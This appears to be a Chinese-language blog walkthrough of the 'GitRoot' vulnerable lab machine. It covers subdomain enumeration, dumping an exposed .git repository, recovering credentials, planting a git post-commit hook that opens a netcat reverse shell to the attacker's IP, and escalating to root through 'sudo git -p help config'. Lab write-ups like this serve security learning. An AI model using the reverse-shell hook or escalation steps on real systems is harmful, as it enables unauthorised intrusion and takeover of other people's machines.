子域名,.git信息泄露(githack使用),多用户提权,.git仓库使用,git提权
端口扫描
提示有子域名
将子域添加到“ /etc/hosts ”文件中。
是个wordpress
尝试破解 WP 但没有成功后,我尝试使用Gobuster工具的“ vhost ”选项和Kali 默认附带的“ big.txt ”字典试试能不能列出更多子域。
将此子域放入我们的主机列表中
没啥东西,爆破一下目录
使用GitTools工具包中的GitDumper ,我们将“ /.git/ ”的所有内容提取到 Kali 中
./gitdumper.sh http://repo.gitroot.vuln/.git/ /root/GitRoot/git-tmp/
会列出各种文件
看一下这个被删除的文件
使用GitTools Kit Extractor工具恢复所有文件(包括“ pablo_HELP ”)
在文件“ set.php ”中找到了一些凭据
爆破
连接
提权枚举
邀请我们查看一个新的git存储库
find / -name .git 2>/dev/null
进入/head文件夹
按大小对它们进行排序,我们会发现有一个比其他的要大
strings HEAD | grep -v 'init repo' | grep -v 'moving from'这个页可以在找关键字
切换用户beth
让我们用一个包含反向 shell 的 .zip 给他一个惊喜,该 zip 包含一个 git 上的“ hooks ”的反向 shell。
我们将创建一个“ post-commit ”文件并使用 python 放置一个反向 shell。我们会给你所有必要的权限,我们将用7zip压缩它并复制到“ jen ”指示的路径
在Git版本控制系统中,hook 文件是一种脚本文件,它允许你在特定的Git事件发生时触发自定义操作。这些脚本存储在Git仓库的 .git/hooks/ 目录中。其中,post-commit 是一种特定类型的 Git hook。
post-commit hook 是在每次成功的提交后执行的脚本。它通常用于执行一些与提交后处理相关的任务,例如发送通知、更新文档、触发构建等。在 .git/hooks/ 目录下,你可以找到一个 post-commit.sample 文件,你可以将其重命名为 post-commit 并编辑其内容以执行你想要的操作。
cd betch
mkdir -p .git/hooks
具体而言,这个命令使用了 -p 选项,这使得命令会递归地创建指定的目录,如果目录不存在的话。所以,如果 .git/hooks 目录不存在,那么它就会被创建。这是确保在仓库中设置Git钩子的一种常见方式。
cd .git/hook/
vim post-commit
#! /bin/bash
/usr/bin/nc -e /bin/bash 192.168.44.184 5555
chmod 777 post-commit
cd /home/beth
7z a xshell.zip .git/
ls -l xshell.zip
chomd 777 xshell.zip
ls -l xshell.zip
-rwxrwxrwx 1 beth beth 489 Jun 6 11:16 xshell.zip
本地监听
复制压缩包到/home/jen/public/repos目录下**
cp xshell.zip /home/jen/public/repos
jen@GitRoot:~$ sudo -l
[sudo] password for jen: binzpbeocnexoe
可以利用git提权
sudo git -p help config
再:后面输入!/bin/sh
成功提权
很好的学习利用Git的靶机
扫一扫
447
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
